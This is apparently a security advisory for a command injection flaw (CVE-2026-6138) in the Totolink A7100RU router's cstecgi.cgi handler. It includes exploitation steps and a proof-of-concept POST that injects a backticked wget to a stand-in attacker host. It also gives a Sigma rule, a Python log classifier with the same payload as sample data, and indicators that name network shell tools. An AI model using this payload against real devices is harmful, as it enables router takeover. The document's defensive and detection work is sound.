CVE-2026-6138: Critical Remote OS Command Injection in Totolink A7100RU

Embedded networking hardware remains a primary target for threat actors. CVE-2026-6138 highlights a catastrophic failure in input sanitization within the Totolink A7100RU CGI handler component. Given the device’s role in network edge infrastructure, this vulnerability represents a significant risk for lateral movement into internal segments.

The vulnerability resides within the /cgi-bin/cstecgi.cgi binary, specifically the setAccessDeviceCfg function. During the processing of the mac argument, the application fails to properly validate or sanitize the user-provided data before passing it to internal system utilities.

Specifically, the user-controlled mac parameter is passed to the Uci_Add_List function (from libcscommon.so). From there the value is embedded into a system command string handled by the CsteSystem function, which subsequently invokes execv(). Because the command string is built without adequate escaping, an attacker can break out of the intended argument context and append arbitrary shell commands.

  1. Target Identification: Identify a reachable instance of Totolink A7100RU running firmware version 7.4cu.2313_b20191024.
  2. Payload Crafting: Prepare a malicious string, such as a shell command (e.g., wget, curl, or a reverse shell), encapsulated in backticks or command separators within the mac field.
  3. Exploitation: Submit the crafted POST request to the vulnerable endpoint.
  4. Execution: The device’s CGI handler interprets the injected command and executes it with system privileges.

The following HTTP request demonstrates how an attacker might leverage this flaw:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: <TARGET_IP>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
{"topicurl":"setAccessDeviceCfg","mac":"`wget <ATTACKER_IP>:<PORT>/testpoc`"}

Analyst teams should prioritize visibility into HTTP traffic targeting the /cgi-bin/ directory on edge routers.

title: Totolink A7100RU Command Injection Attempt
logsource:
    category: web_server
detection:
    selection:
        url|contains: "/cgi-bin/cstecgi.cgi"
        http_method: "POST"
        body|contains: ["setAccessDeviceCfg", "mac"]
    condition: selection
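The selection above will also match every legitimate setAccessDeviceCfg call, since each one carries a mac field. The following added example (not from the original advisory or from Totolink) applies the same selection to constructed access-log entries and then validates the mac value, so only requests whose mac field contains shell metacharacters or is otherwise malformed are reported; the log tuples, the 192.0.2.10 address and the helper names are constructed for illustration.

```python
import json
import re
from typing import Optional

# A well-formed MAC address: six hex octets separated by ':' or '-'.
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}([:-][0-9A-Fa-f]{2}){5}$")
# Shell metacharacters that have no place in a MAC address field.
SHELL_META_RE = re.compile(r"[`;|&$(){}<>\n\\]")

def classify_request(method: str, path: str, body: str) -> Optional[str]:
    """Return a finding for a suspicious cstecgi.cgi request, else None.

    Mirrors the Sigma selection (POST to /cgi-bin/cstecgi.cgi carrying a
    setAccessDeviceCfg body) and additionally validates the mac field so
    that well-formed MAC addresses from admin traffic are not flagged.
    """
    if method != "POST" or "/cgi-bin/cstecgi.cgi" not in path:
        return None
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        return "cstecgi.cgi POST with non-JSON body"
    if payload.get("topicurl") != "setAccessDeviceCfg":
        return None
    mac = payload.get("mac")
    if not isinstance(mac, str):
        return "setAccessDeviceCfg without a string mac field"
    if MAC_RE.match(mac):
        return None  # looks like legitimate configuration traffic
    if SHELL_META_RE.search(mac):
        return f"command injection attempt in mac field: {mac!r}"
    return f"malformed mac field: {mac!r}"

# Constructed access-log entries (method, path, body); not from a real device.
SAMPLE_LOG = [
    ("POST", "/cgi-bin/cstecgi.cgi", '{"topicurl":"setAccessDeviceCfg","mac":"00:11:22:33:44:55"}'),
    ("POST", "/cgi-bin/cstecgi.cgi", '{"topicurl":"setAccessDeviceCfg","mac":"`wget 192.0.2.10/testpoc`"}'),
    ("POST", "/cgi-bin/cstecgi.cgi", '{"topicurl":"setAccessDeviceCfg","mac":"00-11-22-33-44"}'),
    ("POST", "/cgi-bin/cstecgi.cgi", '{"topicurl":"getSysStatusCfg"}'),
    ("GET", "/cgi-bin/cstecgi.cgi", ""),
]

def scan_log(entries):
    """Return (index, finding) pairs for every suspicious entry."""
    return [(i, f) for i, (m, p, b) in enumerate(entries)
            if (f := classify_request(m, p, b)) is not None]

if __name__ == "__main__":
    for idx, finding in scan_log(SAMPLE_LOG):
        print(f"entry {idx}: {finding}")
```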

When investigating potential compromise, focus on the following indicators:

  • Unusual HTTP POST Requests: Monitor logs for requests matching the patterns identified above.
  • Unexpected Process Spawning: Look for evidence of wget, curl, sh, nc, or other network-utility processes spawned by the cstecgi.cgi process.
  • Persistence: Ensure forensic images of the device are analyzed for unauthorized additions to startup scripts or configuration files, which could allow the compromise to persist across reboots.